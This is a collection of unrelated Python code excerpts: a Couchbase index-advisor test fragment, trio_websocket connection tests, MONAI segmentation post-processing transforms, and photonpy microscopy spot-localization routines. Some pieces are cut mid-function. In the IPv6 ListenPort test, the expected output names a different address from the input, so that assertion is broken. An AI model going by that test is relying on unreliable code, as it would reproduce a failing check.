query1=f'SELECT airportname FROM `{self.bucket_name}`.inventory.airport WHERE lower(city) = "lyon" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception | |
<filename>tests/test_connection.py
'''
Unit tests for trio_websocket.
Many of these tests involve networking, i.e. real TCP sockets. To maximize
reliability, all networking tests should follow the following rules:
- Use localhost only. This is stored in the ``HOST`` global variable.
- Servers use dynamic ports: by passing zero as a port, the system selects a
port that is guaranteed to be available.
- The sequence of events between servers and clients should be controlled as
much as possible to make tests as deterministic. More on determinism below.
- If a test involves timing, e.g. a task needs to ``trio.sleep(…)`` for a bit,
then the ``autojump_clock`` fixture should be used.
- Most tests that involve I/O should have an absolute timeout placed on it to
prevent a hung test from blocking the entire test suite. If a hung test is
cancelled with ctrl+C, then PyTest discards its log messages, which makes
debugging really difficult! The ``fail_after(…)`` decorator places an absolute
timeout on test execution that as measured by Trio's clock.
`Read more about writing tests with pytest-trio.
<https://pytest-trio.readthedocs.io/en/latest/>`__
Determinism is an important property of tests, but it can be tricky to
accomplish with network tests. For example, if a test has a client and a server,
then they may race each other to close the connection first. The test author
should select one side to always initiate the closing handshake. For example, if
a test needs to ensure that the client closes first, then it can have the server
call ``ws.get_message()`` without actually sending it a message. This will cause
the server to block until the client has sent the closing handshake. In other
circumstances
'''
from functools import partial, wraps
import attr
import pytest
import trio
import trustme
from async_generator import async_generator, yield_
from trio_websocket import (
connect_websocket,
connect_websocket_url,
ConnectionClosed,
open_websocket,
open_websocket_url,
serve_websocket,
WebSocketServer,
wrap_client_stream,
wrap_server_stream
)
from trio_websocket._impl import ListenPort
HOST = '127.0.0.1'
RESOURCE = '/resource'
DEFAULT_TEST_MAX_DURATION = 1
# Timeout tests follow a general pattern: one side waits TIMEOUT seconds for an
# event. The other side delays for FORCE_TIMEOUT seconds to force the timeout
# to trigger. Each test also has maximum runtime (measure by Trio's clock) to
# prevent a faulty test from hanging the entire suite.
TIMEOUT = 1
FORCE_TIMEOUT = 2
TIMEOUT_TEST_MAX_DURATION = 3
@pytest.fixture
@async_generator
async def echo_server(nursery):
''' A server that reads one message, sends back the same message,
then closes the connection. '''
serve_fn = partial(serve_websocket, echo_request_handler, HOST, 0,
ssl_context=None)
server = await nursery.start(serve_fn)
await yield_(server)
@pytest.fixture
@async_generator
async def echo_conn(echo_server):
''' Return a client connection instance that is connected to an echo
server. '''
async with open_websocket(HOST, echo_server.port, RESOURCE,
use_ssl=False) as conn:
await yield_(conn)
async def echo_request_handler(request):
'''
Accept incoming request and then pass off to echo connection handler.
'''
conn = await request.accept()
try:
msg = await conn.get_message()
await conn.send_message(msg)
except ConnectionClosed:
pass
class fail_after:
''' This decorator fails if the runtime of the decorated function (as
measured by the Trio clock) exceeds the specified value. '''
def __init__(self, seconds):
self._seconds = seconds
def __call__(self, fn):
@wraps(fn)
async def wrapper(*args, **kwargs):
with trio.move_on_after(self._seconds) as cancel_scope:
await fn(*args, **kwargs)
if cancel_scope.cancelled_caught:
pytest.fail('Test runtime exceeded the maximum {} seconds'
.format(self._seconds))
return wrapper
@attr.s(hash=False, cmp=False)
class MemoryListener(trio.abc.Listener):
closed = attr.ib(default=False)
accepted_streams = attr.ib(factory=list)
queued_streams = attr.ib(factory=(lambda: trio.open_memory_channel(1)))
accept_hook = attr.ib(default=None)
async def connect(self):
assert not self.closed
client, server = memory_stream_pair()
await self.queued_streams[0].send(server)
return client
async def accept(self):
await trio.hazmat.checkpoint()
assert not self.closed
if self.accept_hook is not None:
await self.accept_hook()
stream = await self.queued_streams[1].receive()
self.accepted_streams.append(stream)
return stream
async def aclose(self):
self.closed = True
await trio.hazmat.checkpoint()
async def test_listen_port_ipv4():
assert str(ListenPort('10.105.0.2', 80, False)) == 'ws://10.105.0.2:80'
assert str(ListenPort('127.0.0.1', 8000, False)) == 'ws://127.0.0.1:8000'
assert str(ListenPort('0.0.0.0', 443, True)) == 'wss://0.0.0.0:443'
async def test_listen_port_ipv6():
assert str(ListenPort('fdf8:f53e:61e4::18', 80, False)) \
== 'ws://[2599:8807:6201:b7:16cf:bb9c:a6d3:51ab]:80'
assert str(ListenPort('::1', 8000, False)) == 'ws://[::1]:8000'
assert str(ListenPort('::', 443, True)) == 'wss://[::]:443'
async def test_server_has_listeners(nursery):
server = await nursery.start(serve_websocket, echo_request_handler, HOST, 0,
None)
assert len(server.listeners) > 0
assert isinstance(server.listeners[0], ListenPort)
async def test_serve(nursery):
task = trio.hazmat.current_task()
server = await nursery.start(serve_websocket, echo_request_handler, HOST, 0,
None)
port = server.port
assert server.port != 0
# The server nursery begins with one task (server.listen).
assert len(nursery.child_tasks) == 1
no_clients_nursery_count = len(task.child_nurseries)
async with open_websocket(HOST, port, RESOURCE, use_ssl=False) as conn:
# The server nursery has the same number of tasks, but there is now
# one additional nested nursery.
assert len(nursery.child_tasks) == 1
assert len(task.child_nurseries) == no_clients_nursery_count + 1
async def test_serve_ssl(nursery):
server_context = trio.ssl.create_default_context(
trio.ssl.Purpose.CLIENT_AUTH)
client_context = trio.ssl.create_default_context()
ca = trustme.CA()
ca.configure_trust(client_context)
cert = ca.issue_server_cert(HOST)
cert.configure_cert(server_context)
server = await nursery.start(serve_websocket, echo_request_handler, HOST, 0,
server_context)
port = server.port
async with open_websocket(HOST, port, RESOURCE, use_ssl=client_context
) as conn:
assert not conn.closed
async def test_serve_handler_nursery(nursery):
task = trio.hazmat.current_task()
async with trio.open_nursery() as handler_nursery:
serve_with_nursery = partial(serve_websocket, echo_request_handler,
HOST, 0, None, handler_nursery=handler_nursery)
server = await nursery.start(serve_with_nursery)
port = server.port
# The server nursery begins with one task (server.listen).
assert len(nursery.child_tasks) == 1
no_clients_nursery_count = len(task.child_nurseries)
async with open_websocket(HOST, port, RESOURCE, use_ssl=False) as conn:
# The handler nursery should have one task in it
# (conn._reader_task).
assert len(handler_nursery.child_tasks) == 1
async def test_serve_with_zero_listeners(nursery):
task = trio.hazmat.current_task()
with pytest.raises(ValueError):
server = WebSocketServer(echo_request_handler, [])
async def test_serve_non_tcp_listener(nursery):
listeners = [MemoryListener()]
server = WebSocketServer(echo_request_handler, listeners)
await nursery.start(server.run)
assert len(server.listeners) == 1
with pytest.raises(RuntimeError):
server.port
assert server.listeners[0].startswith('MemoryListener(')
async def test_serve_multiple_listeners(nursery):
listener1 = (await trio.open_tcp_listeners(0, host=HOST))[0]
listener2 = MemoryListener()
server = WebSocketServer(echo_request_handler, [listener1, listener2])
await nursery.start(server.run)
assert len(server.listeners) == 2
with pytest.raises(RuntimeError):
# Even though the first listener has a port, this property is only
# usable if you have exactly one listener.
server.port
# The first listener metadata is a ListenPort instance.
assert server.listeners[0].port != 0
# The second listener metadata is a string containing the repr() of a
# MemoryListener object.
assert server.listeners[1].startswith('MemoryListener(')
async def test_client_open(echo_server):
async with open_websocket(HOST, echo_server.port, RESOURCE, use_ssl=False) \
as conn:
assert not conn.closed
async def test_client_open_url(echo_server):
url = 'ws://{}:{}{}/path'.format(HOST, echo_server.port, RESOURCE)
async with open_websocket_url(url) as conn:
assert conn.path == RESOURCE + '/path'
url = 'ws://{}:{}{}?foo=bar'.format(HOST, echo_server.port, RESOURCE)
async with open_websocket_url(url) as conn:
assert conn.path == RESOURCE + '?foo=bar'
async def test_client_open_invalid_url(echo_server):
with pytest.raises(ValueError):
async with open_websocket_url('http://foo.com/bar') as conn:
pass
async def test_client_connect(echo_server, nursery):
conn = await connect_websocket(nursery, HOST, echo_server.port, RESOURCE,
use_ssl=False)
assert not conn.closed
async def test_client_connect_url(echo_server, nursery):
url = 'ws://{}:{}{}'.format(HOST, echo_server.port, RESOURCE)
conn = await connect_websocket_url(nursery, url)
assert not conn.closed
async def test_handshake_subprotocol(nursery):
async def handler(request):
assert request.proposed_subprotocols == ('chat', 'file')
assert request.subprotocol is None
request.subprotocol = 'chat'
assert request.subprotocol == 'chat'
server_ws = await request.accept()
assert server_ws.subprotocol == 'chat'
server = await nursery.start(serve_websocket, handler, HOST, 0, None)
async with open_websocket(HOST, server.port, RESOURCE, use_ssl=False,
subprotocols=('chat', 'file')) as client_ws:
assert client_ws.subprotocol == 'chat'
async def test_client_send_and_receive(echo_conn):
async with echo_conn:
await echo_conn.send_message('This is a test message.')
received_msg = await echo_conn.get_message()
assert received_msg == 'This is a test message.'
async def test_client_ping(echo_conn):
async with echo_conn:
await echo_conn.ping(b'A')
with pytest.raises(ConnectionClosed):
await echo_conn.ping(b'B')
async def test_client_ping_two_payloads(echo_conn):
pong_count = 0
async def ping_and_count():
nonlocal pong_count
await echo_conn.ping()
pong_count += 1
async with echo_conn:
async with trio.open_nursery() as nursery:
nursery.start_soon(ping_and_count)
nursery.start_soon(ping_and_count)
assert pong_count == 2
async def test_client_ping_same_payload(echo_conn):
# This test verifies that two tasks can't ping with the same payload at the
# same time. One of them should succeed and the other should get an
# exception.
exc_count = 0
async def ping_and_catch():
nonlocal exc_count
try:
await echo_conn.ping(b'A')
except ValueError:
exc_count += 1
async with echo_conn:
async with trio.open_nursery() as nursery:
nursery.start_soon(ping_and_catch)
nursery.start_soon(ping_and_catch)
assert exc_count == 1
async def test_client_pong(echo_conn):
async with echo_conn:
await echo_conn.pong(b'A')
with pytest.raises(ConnectionClosed):
await echo_conn.pong(b'B')
async def test_client_default_close(echo_conn):
async with echo_conn:
assert not echo_conn.closed
assert echo_conn.closed.code == 1000
assert echo_conn.closed.reason is None
async def test_client_nondefault_close(echo_conn):
async with echo_conn:
assert not echo_conn.closed
await echo_conn.aclose(code=1001, reason='test reason')
assert echo_conn.closed.code == 1001
assert echo_conn.closed.reason == 'test reason'
async def test_wrap_client_stream(echo_server, nursery):
stream = await trio.open_tcp_stream(HOST, echo_server.port)
conn = await wrap_client_stream(nursery, stream, HOST, RESOURCE)
async with conn:
assert not conn.closed
await conn.send_message('Hello from client!')
msg = await conn.get_message()
assert msg == 'Hello from client!'
assert conn.closed
async def test_wrap_server_stream(nursery):
async def handler(stream):
request = await wrap_server_stream(nursery, stream)
server_ws = await request.accept()
async with server_ws:
assert not server_ws.closed
msg = await server_ws.get_message()
assert msg == 'Hello from client!'
assert server_ws.closed
serve_fn = partial(trio.serve_tcp, handler, 0, host=HOST)
listeners = await nursery.start(serve_fn)
port = listeners[0].socket.getsockname()[1]
| |
If the data is in one-hot format, this is used to determine which channels to apply.
independent: whether to treat ``applied_labels`` as a union of foreground labels.
If ``True``, the connected component analysis will be performed on each foreground label independently
and return the intersection of the largest components.
If ``False``, the analysis will be performed on the union of foreground labels.
default is `True`.
connectivity: Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.
Accepted values are ranging from 1 to input.ndim. If ``None``, a full
connectivity of ``input.ndim`` is used.
"""
super().__init__()
self.applied_labels = ensure_tuple(applied_labels)
self.independent = independent
self.connectivity = connectivity
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Args:
img: shape must be (C, spatial_dim1[, spatial_dim2, ...]).
Returns:
An array with shape (C, spatial_dim1[, spatial_dim2, ...]).
"""
is_onehot = img.shape[0] > 1
if self.independent:
for i in self.applied_labels:
foreground = img[i] > 0 if is_onehot else img[0] == i
mask = get_largest_connected_component_mask(foreground, self.connectivity)
if is_onehot:
img[i][foreground != mask] = 0
else:
img[0][foreground != mask] = 0
return img
if not is_onehot: # not one-hot, union of labels
labels, *_ = convert_to_dst_type(self.applied_labels, dst=img, wrap_sequence=True)
foreground = (img[..., None] == labels).any(-1)[0]
mask = get_largest_connected_component_mask(foreground, self.connectivity)
img[0][foreground != mask] = 0
return img
# one-hot, union of labels
foreground = (img[self.applied_labels, ...] == 1).any(0)
mask = get_largest_connected_component_mask(foreground, self.connectivity)
for i in self.applied_labels:
img[i][foreground != mask] = 0
return img
class LabelFilter:
"""
This transform filters out labels and can be used as a processing step to view only certain labels.
The list of applied labels defines which labels will be kept.
Note:
All labels which do not match the `applied_labels` are set to the background label (0).
For example:
Use LabelFilter with applied_labels=[1, 5, 9]::
[1, 2, 3] [1, 0, 0]
[4, 5, 6] => [0, 5 ,0]
[7, 8, 9] [0, 0, 9]
"""
backend = [TransformBackends.TORCH, TransformBackends.NUMPY]
def __init__(self, applied_labels: Union[Iterable[int], int]) -> None:
"""
Initialize the LabelFilter class with the labels to filter on.
Args:
applied_labels: Label(s) to filter on.
"""
self.applied_labels = ensure_tuple(applied_labels)
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Filter the image on the `applied_labels`.
Args:
img: Pytorch tensor or numpy array of any shape.
Raises:
NotImplementedError: The provided image was not a Pytorch Tensor or numpy array.
Returns:
Pytorch tensor or numpy array of the same shape as the input.
"""
if not isinstance(img, (np.ndarray, torch.Tensor)):
raise NotImplementedError(f"{self.__class__} can not handle data of type {type(img)}.")
if isinstance(img, torch.Tensor):
if hasattr(torch, "isin"):
appl_lbls = torch.as_tensor(self.applied_labels, device=img.device)
return torch.where(torch.isin(img, appl_lbls), img, torch.tensor(0.0).to(img))
else:
out = self(img.detach().cpu().numpy())
out, *_ = convert_to_dst_type(out, img)
return out
return np.asarray(np.where(np.isin(img, self.applied_labels), img, 0))
class FillHoles(Transform):
r"""
This transform fills holes in the image and can be used to remove artifacts inside segments.
An enclosed hole is defined as a background pixel/voxel which is only enclosed by a single class.
The definition of enclosed can be defined with the connectivity parameter::
1-connectivity 2-connectivity diagonal connection close-up
[ ] [ ] [ ] [ ] [ ]
| \ | / | <- hop 2
[ ]--[x]--[ ] [ ]--[x]--[ ] [x]--[ ]
| / | \ hop 1
[ ] [ ] [ ] [ ]
It is possible to define for which labels the hole filling should be applied.
The input image is assumed to be a PyTorch Tensor or numpy array with shape [C, spatial_dim1[, spatial_dim2, ...]].
If C = 1, then the values correspond to expected labels.
If C > 1, then a one-hot-encoding is expected where the index of C matches the label indexing.
Note:
The label 0 will be treated as background and the enclosed holes will be set to the neighboring class label.
The performance of this method heavily depends on the number of labels.
It is a bit faster if the list of `applied_labels` is provided.
Limiting the number of `applied_labels` results in a big decrease in processing time.
For example:
Use FillHoles with default parameters::
[1, 1, 1, 2, 2, 2, 3, 3] [1, 1, 1, 2, 2, 2, 3, 3]
[1, 0, 1, 2, 0, 0, 3, 0] => [1, 1 ,1, 2, 0, 0, 3, 0]
[1, 1, 1, 2, 2, 2, 3, 3] [1, 1, 1, 2, 2, 2, 3, 3]
The hole in label 1 is fully enclosed and therefore filled with label 1.
The background label near label 2 and 3 is not fully enclosed and therefore not filled.
"""
backend = [TransformBackends.NUMPY]
def __init__(
self, applied_labels: Optional[Union[Iterable[int], int]] = None, connectivity: Optional[int] = None
) -> None:
"""
Initialize the connectivity and limit the labels for which holes are filled.
Args:
applied_labels: Labels for which to fill holes. Defaults to None, that is filling holes for all labels.
connectivity: Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.
Accepted values are ranging from 1 to input.ndim. Defaults to a full connectivity of ``input.ndim``.
"""
super().__init__()
self.applied_labels = ensure_tuple(applied_labels) if applied_labels else None
self.connectivity = connectivity
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Fill the holes in the provided image.
Note:
The value 0 is assumed as background label.
Args:
img: Pytorch Tensor or numpy array of shape [C, spatial_dim1[, spatial_dim2, ...]].
Raises:
NotImplementedError: The provided image was not a Pytorch Tensor or numpy array.
Returns:
Pytorch Tensor or numpy array of shape [C, spatial_dim1[, spatial_dim2, ...]].
"""
if not isinstance(img, (np.ndarray, torch.Tensor)):
raise NotImplementedError(f"{self.__class__} can not handle data of type {type(img)}.")
img_np: np.ndarray
img_np, *_ = convert_data_type(img, np.ndarray) # type: ignore
out_np: np.ndarray = fill_holes(img_np, self.applied_labels, self.connectivity)
out, *_ = convert_to_dst_type(out_np, img)
return out
class LabelToContour(Transform):
"""
Return the contour of binary input images that only compose of 0 and 1, with Laplacian kernel
set as default for edge detection. Typical usage is to plot the edge of label or segmentation output.
Args:
kernel_type: the method applied to do edge detection, default is "Laplace".
Raises:
NotImplementedError: When ``kernel_type`` is not "Laplace".
"""
backend = [TransformBackends.TORCH]
def __init__(self, kernel_type: str = "Laplace") -> None:
if kernel_type != "Laplace":
raise NotImplementedError('Currently only kernel_type="Laplace" is supported.')
self.kernel_type = kernel_type
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Args:
img: torch tensor data to extract the contour, with shape: [channels, height, width[, depth]]
Raises:
ValueError: When ``image`` ndim is not one of [3, 4].
Returns:
A torch tensor with the same shape as img, note:
1. it's the binary classification result of whether a pixel is edge or not.
2. in order to keep the original shape of mask image, we use padding as default.
3. the edge detection is just approximate because it defects inherent to Laplace kernel,
ideally the edge should be thin enough, but now it has a thickness.
"""
img_: torch.Tensor = convert_data_type(img, torch.Tensor)[0] # type: ignore
spatial_dims = len(img_.shape) - 1
img_ = img_.unsqueeze(0) # adds a batch dim
if spatial_dims == 2:
kernel = torch.tensor([[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]], dtype=torch.float32)
elif spatial_dims == 3:
kernel = -1.0 * torch.ones(3, 3, 3, dtype=torch.float32)
kernel[1, 1, 1] = 26.0
else:
raise ValueError(f"{self.__class__} can only handle 2D or 3D images.")
contour_img = apply_filter(img_, kernel)
contour_img.clamp_(min=0.0, max=1.0)
output, *_ = convert_to_dst_type(contour_img.squeeze(0), img)
return output
class Ensemble:
@staticmethod
def get_stacked_torch(img: Union[Sequence[NdarrayOrTensor], NdarrayOrTensor]) -> torch.Tensor:
"""Get either a sequence or single instance of np.ndarray/torch.Tensor. Return single torch.Tensor."""
if isinstance(img, Sequence) and isinstance(img[0], np.ndarray):
img = [torch.as_tensor(i) for i in img]
elif isinstance(img, np.ndarray):
img = torch.as_tensor(img)
out: torch.Tensor = torch.stack(img) if isinstance(img, Sequence) else img # type: ignore
return out
@staticmethod
def post_convert(img: torch.Tensor, orig_img: Union[Sequence[NdarrayOrTensor], NdarrayOrTensor]) -> NdarrayOrTensor:
orig_img_ = orig_img[0] if isinstance(orig_img, Sequence) else orig_img
out, *_ = convert_to_dst_type(img, orig_img_)
return out
class MeanEnsemble(Ensemble, Transform):
"""
Execute mean ensemble on the input data.
The input data can be a list or tuple of PyTorch Tensor with shape: | |
<reponame>qnano/photonpy<gh_stars>1-10
import numpy as np
import time
import tqdm
import os
from photonpy import Context, GaussianPSFMethods, Estimator, Dataset
import photonpy.cpp.spotdetect as spotdetect
from photonpy.cpp.calib import GainOffset_Calib
from photonpy.cpp.calib import GainOffsetImage_Calib
from photonpy.cpp.estim_queue import EstimQueue
from photonpy.cpp.roi_queue import ROIQueue
from photonpy.cpp.image_proc import ROIExtractor
import photonpy.utils.multipart_tiff as tiff
import tifffile
import matplotlib.pyplot as plt
from photonpy.utils.array import peek_first
from scipy.interpolate import InterpolatedUnivariateSpline
def end_of_file(f):
curpos = f.tell()
f.seek(0,2)
file_size = f.tell()
f.seek(curpos,0)
return curpos == file_size
def detect_spots(sdcfg, calib, movie, sumframes, output_fn, batch_size, ctx:Context, numThreads=3):
sm = spotdetect.SpotDetectionMethods(ctx)
with Context(ctx.smlm) as lq_ctx, open(output_fn, "wb") as f:
roishape = [sdcfg.roisize,sdcfg.roisize]
numframes = 0
numrois = 0
for i,img in enumerate(movie):
if i==0:
q,rq = sm.CreateQueue(img.shape, roishape, sdcfg, calib=calib,sumframes=sumframes, ctx=lq_ctx, numThreads=numThreads)
def save_rois(rois_info, pixels):
np.save(f, rois_info, allow_pickle=False)
np.save(f, pixels, allow_pickle=False)
nonlocal numrois
numrois += len(rois_info)
q.PushFrameU16(img)
numframes += 1
rl = rq.Length()
if rl>batch_size:
save_rois(*rq.Fetch())
while q.NumFinishedFrames() < numframes//sumframes:
time.sleep(0.1)
if rq.Length()>0:
save_rois(*rq.Fetch())
return numrois, numframes
def load_rois_iterator(rois_fn, maxrois=None):
"""
Load rois sequentially so we can deal with very large datasets
"""
with open(rois_fn, "rb") as f:
total = 0
while not end_of_file(f):
rois_info = np.load(f)
pixels = np.load(f)
if maxrois is not None:
if len(pixels) + total >= maxrois:
rem = maxrois - total
yield rois_info[:rem], pixels[:rem]
return
total += len(pixels)
yield rois_info, pixels
def load_rois(rois_fn, maxrois=None):
rois_info = []
pixels = []
for ri,px in load_rois_iterator(rois_fn, maxrois):
rois_info.append(ri)
pixels.append(px)
return np.concatenate(rois_info), np.concatenate(pixels)
def extract_rois_iterator(movie, roipos, roiframe, calib, roisize,
ctx:Context, minBatchSize):
"""
Extract predefined ROIs from a TIFF or other image iterator.
Calib: camera calibration as created with create_calib_obj
roipos: Corner positions [[y,x]...]
TODO: Save to disk in batches to remove memory bottleneck
"""
roilist = np.zeros(len(roipos),dtype=ROIExtractor.ROIType)
roilist['cornerpos'] = roipos
roilist['startframe'] = roiframe
roilist['numframes'] = 1
with Context(ctx.smlm) as ex_ctx:
q = None
numframes = 0
for i,img in enumerate(movie):
if i == 0:
q = ROIExtractor(img.shape, roilist, 1, roisize, calib, ex_ctx)
q.PushFrame(img)
numframes += 1
resultcount = q.GetResultCount()
if resultcount > minBatchSize:
rois,frames = q.GetResults(resultcount)
yield rois,frames
while not q.IsIdle():
time.sleep(0.1)
resultcount = q.GetResultCount()
if resultcount > minBatchSize:
rois,frames = q.GetResults(resultcount)
yield rois,frames
resultcount = q.GetResultCount()
if resultcount>0:
rois,frames = q.GetResults(resultcount)
yield rois,frames
def localize_rois(rois_data_source, psf, initial_estim=None, constants=None, prog_cb=None, total=None):
"""
Runs PSF centroid estimation on the given ROIs using the PSF.
The PSF must be created with cuda=True
rois_data_source can either be a file generated by detect_rois, or
a tuple with the ROI data (rois_info, pixels)
"""
if type(rois_data_source) == str:
iterator = load_rois_iterator(rois_data_source)
else:
iterator = rois_data_source
framenums = []
with EstimQueue(psf,batchSize=1024) as queue, tqdm.tqdm(total=total) as pb:
count = 0
lastrc = 0
def progupdate():
nonlocal lastrc
rc = queue.GetResultCount()
progress = rc-lastrc
pb.update(progress)
lastrc = rc
if prog_cb is None:
return True
return prog_cb(rc)
for rois_info, pixels in iterator:
roipos = np.zeros((len(rois_info),2))
roipos[:,0] = rois_info['y']
roipos[:,1] = rois_info['x']
framenum = rois_info['id']
framenums.append(framenum)
if initial_estim is not None:
initial = initial_estim[count:count+len(pixels)]
else:
initial = None
if constants is not None:
batch_constants = constants[count:count+len(pixels)]
else:
batch_constants = None
queue.Schedule(pixels, ids=np.arange(count,count+len(pixels)), roipos=roipos, initial=initial, constants=batch_constants)
count += len(pixels)
if not progupdate():
return None
queue.Flush()
while not queue.IsIdle():
time.sleep(0.05)
progupdate()
progupdate()
r = queue.GetResults(getSampleData=False)
r.SortByID(isUnique=True) # reorder back to original ROI order
r.ids = np.concatenate(framenums)
return r
def create_calib_obj(gain,offset,imgshape,ctx):
if type(gain)==str:
print(f'estimating gain from light {gain} and dark {offset} frames')
light = tifffile.imread(gain)
offset = tifffile.imread(offset)
if not np.array_equal(imgshape, light.shape[1:]):
raise ValueError(f'Camera light frames calibration data ({light.shape[1:]}) does not match with expected image size ({imgshape})')
if not np.array_equal(imgshape, offset.shape[1:]):
raise ValueError(f'Camera offset calibration ({offset.shape[1:]}) does not match with expected image size ({imgshape})')
offset = np.mean(offset,0)
sig = light-offset
v = np.var(sig, 0)
m = np.mean(sig,0)
gain = v/m
gain[gain==0] = np.mean(gain)
print(f'mean camera gain: {np.mean(gain):.2f} ADU/photons offset: {np.mean(offset):.2f}',flush=True)
if type(offset)==str:
print(f'using mean values from {offset} as camera offset',flush=True)
offset=tiff.get_tiff_mean(offset)
if type(gain)!=str:
gain = np.ones(imgshape)*gain
if( type(offset)==np.ndarray):
calib = GainOffsetImage_Calib(gain, offset, ctx)
else:
calib = GainOffset_Calib(gain, offset, ctx)
return calib
def _summed_movie(movie, sumframes):
img = None
f = 0
for m in movie:
if f == 0:
img = m.copy()
else:
img += m
f += 1
if f == sumframes:
img_ = img
img = None
f = 0
yield img_
class Localizer2D:
"""
Perform localization on a tiff with a 2D Gaussian PSF model
"""
def __init__(self):
...
def process(self, tiff_fn_or_iterator, cfg, output_file=None, progress_cb=None, cache_dir=None):
self.cfg=cfg
roisize = cfg['roisize']
threshold = cfg['threshold']
gain = cfg['gain']
offset = cfg['offset']
startframe = cfg['startframe'] if 'startframe' in cfg else 0
maxframes = cfg['maxframes'] if 'maxframes' in cfg else -1
sumframes = cfg['sumframes'] if 'sumframes' in cfg else 1
maxChiSquare = cfg['maxchisq'] if 'maxchisq' in cfg else None
if maxChiSquare is not None and maxChiSquare == 0:
maxChiSquare = None
sigmaFramesPerBin = cfg['sigmaframesperbin'] if 'sigmaframesperbin' in cfg else None
spotDetectSigma = cfg['spotdetectsigma']
fovOffsets = cfg['fov_offsets'] if 'fov_offsets' in cfg else None
useTiltedBg = cfg['tilted_bg'] if 'tilted_bg' in cfg else None
abort=False
def progcb(txt,prog):
nonlocal abort
if progress_cb is not None:
r = progress_cb(txt,prog)
if not r:
abort=True
return r
return True
with Context() as ctx:
gaussian = GaussianPSFMethods(ctx)
if type(tiff_fn_or_iterator) == str:
movie = tiff.tiff_read_file(tiff_fn_or_iterator, startframe, maxframes, progress_cb)
if sumframes > 1:
movie = _summed_movie(movie, sumframes)
offset *= sumframes
else:
movie = tiff_fn_or_iterator
if output_file is not None:
rois_output_fn = os.path.splitext(output_file)[0]+"_rois.npy"
else:
rois_output_fn = os.path.splitext(tiff_fn_or_iterator)[0]+"_rois.npy"
if cache_dir is not None:
rois_output_fn = cache_dir + os.path.split(os.path.splitext(output_file)[0]+"_rois.npy")[1]
self.rois_output_fn = rois_output_fn
first_image, movie = peek_first(movie)
imgshape = first_image.shape
spotDetector = spotdetect.SpotDetector(spotDetectSigma, roisize, threshold)
calib = create_calib_obj(gain,offset,imgshape,ctx)
numrois,_ = detect_spots(spotDetector, calib, movie, 1, rois_output_fn, batch_size=20000, ctx=ctx)
if numrois == 0:
raise ValueError('No spots found')
psf = gaussian.CreatePSF_XYIBg(roisize, spotDetectSigma, True)
prog_cb = lambda cur: progress_cb(f'Fitting 2D Gaussian with approx. PSF sigma. ({cur}/{numrois})', cur/numrois)
if progress_cb is None:
prog_cb = None
qr = localize_rois(rois_output_fn, psf, prog_cb=prog_cb, total=numrois)
if qr is None:
return
framenum = qr.ids
# Re-estimate including sigma (x,y) fits
estim = np.zeros((len(qr.estim), 6))
estim[:,:4] = qr.estim
estim[:,4:] = spotDetectSigma
psf_sigma = gaussian.CreatePSF_XYIBgSigmaXY(roisize, spotDetectSigma, True)
prog_cb = lambda cur: progress_cb(f'Fitting 2D Gaussian including PSF sigma. ({cur}/{numrois})', cur/numrois)
if progress_cb is None:
prog_cb = None
qr_sigma = localize_rois(rois_output_fn, psf_sigma, initial_estim=estim, prog_cb=prog_cb, total=numrois)
if qr_sigma is None:
return
# Estimate per-frame sigma and interpolate using splines to account for Z drift
ds = Dataset.fromQueueResults(qr_sigma, imgshape)
self.ds_sigma_fits = ds
if len(ds) == 0:
raise ValueError('PSF Sigma fits failed')
numframes = np.max(framenum)+1
ds.data.frame = np.maximum((ds.data.frame / sigmaFramesPerBin - 0.5).astype(np.int32),0)
frames = ds.indicesPerFrame()
self.medianSigma = np.array([np.median(ds.data.estim.sigma[idx],0) for idx in frames])
self.sigma_t = (0.5+np.arange(len(frames))) * sigmaFramesPerBin
#self.medianSigma = [self.medianSigma[0], *self.medianSigma, self.medianSigma[-1]]
self.sigma_t[0] = 0
self.sigma_t[-1] = (len(frames)-1) * sigmaFramesPerBin
spl_x = InterpolatedUnivariateSpline(self.sigma_t, self.medianSigma[:,0], k=2)
spl_y = InterpolatedUnivariateSpline(self.sigma_t, self.medianSigma[:,1], k=2)
self.sigma = np.zeros((numframes,2))
self.sigma[:,0] = spl_x(np.arange(numframes))
self.sigma[:,1] = spl_y(np.arange(numframes))
# Re-estimate using known sigmas
psf = gaussian.CreatePSF_XYIBg(roisize, sigma=None, cuda=True)
roi_sigmas = self.sigma[framenum]
prog_cb = lambda cur: progress_cb(f'Fitting 2D Gaussian using interpolated PSF sigma. ({cur}/{numrois})', cur/numrois)
if progress_cb is None:
prog_cb = None
r = localize_rois(rois_output_fn, psf, constants=roi_sigmas, prog_cb=prog_cb, total=numrois)
if r is None:
return
ds = Dataset.fromQueueResults(r, imgshape, config=cfg, sigma=self.sigma)
if type(tiff_fn_or_iterator) == str:
ds['imagefile'] = tiff_fn_or_iterator
print('Filtering hitting ROI border')
borderxy = 2.5
lpos = ds.local_pos
ds.filter((lpos[:,0] > borderxy) & (lpos[:,1] > borderxy) &
(lpos[:,0] < roisize-borderxy-1) & (lpos[:,1] < roisize-borderxy-1))
self.unfilteredChisq = ds.chisq*1
if maxChiSquare is not None:
print(f"Filtering on chi-square at threshold {maxChiSquare}*{roisize*roisize}...")
self.chiSqThreshold = maxChiSquare*roisize**2
ds.filter(ds.chisq<self.chiSqThreshold)
else:
self.chiSqThreshold = None
nframes = ds.numFrames
print(f"Num spots: {len(ds)}. {len(r.estim) / nframes} spots/frame.")
if output_file is not None:
ds.save(output_file)
self.result=ds
ds.config['locs_path'] = output_file
return ds
def plotSigmaFits(self):
plt.figure()
